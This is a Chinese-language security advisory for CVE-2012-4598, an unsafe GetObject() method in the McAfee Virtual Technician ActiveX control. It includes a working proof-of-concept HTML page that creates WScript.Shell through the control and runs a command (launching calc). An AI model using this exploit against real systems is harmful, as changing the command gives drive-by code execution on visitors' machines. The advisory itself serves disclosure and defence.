安全研究

安全漏洞
McAfee Virtual Technician ActiveX控件'GetObject()'不安全方法漏洞

发布日期:2012-04-30
更新日期:2012-05-02

受影响系统:
McAfee Virtual Technician 6.3.0.1911
描述:
BUGTRAQ  ID: 53304
CVE(CAN) ID: CVE-2012-4598

McAfee Virtual Technician是分析诊断工具。

McAfee Virtual Technician 6.3.0.1911版本的MVTControl ActiveX Control中存在安全漏洞,"GetObject()"方法(mvt.dll)允许实例化任意COM对象,可使用"WScript.Shell"组件加以利用,通过"Exec()"方法执行任意命令。

<*来源:rgod (rgod@autistici.org
  
  链接:http://secunia.com/advisories/49007/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

rgod (rgod@autistici.org)提供了如下测试方法:

<!--
McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 ActiveX Control
GetObject() Security Bypass Remote Code Execution PoC

Binary path: C:\Program Files\McAfee\Supportability\MVT\MVT.dll
ProgID: MVT.MVTControl.6300
CLSID: {2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety: false

//rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:2EBE1406-BE0E-44E6-AE10-247A0C5AEDCF' id='obj' />
</object>
<script defer=defer>
var x = obj.GetObject("WScript.Shell");
x.Exec("cmd /c start calc");
var y = obj.GetObject(0x0c0c0c0c);
</script>

建议:
厂商补丁:

McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mcafee.com/

浏览次数:2367
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障